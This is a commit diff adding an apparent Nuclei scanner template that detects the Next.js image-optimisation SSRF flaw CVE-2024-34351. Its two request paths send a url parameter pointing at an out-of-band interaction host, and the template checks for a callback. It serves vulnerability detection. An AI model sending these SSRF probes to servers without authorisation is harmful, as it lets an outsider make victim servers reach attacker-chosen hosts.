Add files via upload
parent
f81354cb21
commit
d4415866ae
|
@ -0,0 +1,28 @@
|
|||
id: CVE-2024-34351
|
||||
|
||||
info:
|
||||
name: Next.js - SSRF
|
||||
author: righettod
|
||||
severity: high
|
||||
remediation: Upgrade to Next.js version 14.1.1 or higher.
|
||||
description: |
|
||||
Next.Js, inferior to version 14.1.1, have its image optimization built-in component prone to SSRF.
|
||||
reference:
|
||||
- https://www.assetnote.io/resources/research/digging-for-ssrf-in-nextjs-apps
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2024-34351
|
||||
- https://github.com/vercel/next.js/security/advisories/GHSA-fr5h-rqp8-mj6g
|
||||
metadata:
|
||||
max-request: 2
|
||||
tags: cve,cve2024,vercel,nextjs,ssrf
|
||||
|
||||
http:
|
||||
- method: GET
|
||||
path:
|
||||
- '{{BaseURL}}/_next/image?w=16&q=10&url=http://{{interactsh-url}}'
|
||||
- '{{BaseURL}}/_next/image?w=16&q=10&url=https://{{interactsh-url}}'
|
||||
|
||||
matchers:
|
||||
- type: word
|
||||
part: interactsh_protocol
|
||||
words:
|
||||
- 'http'
|
Loading…
Reference in New Issue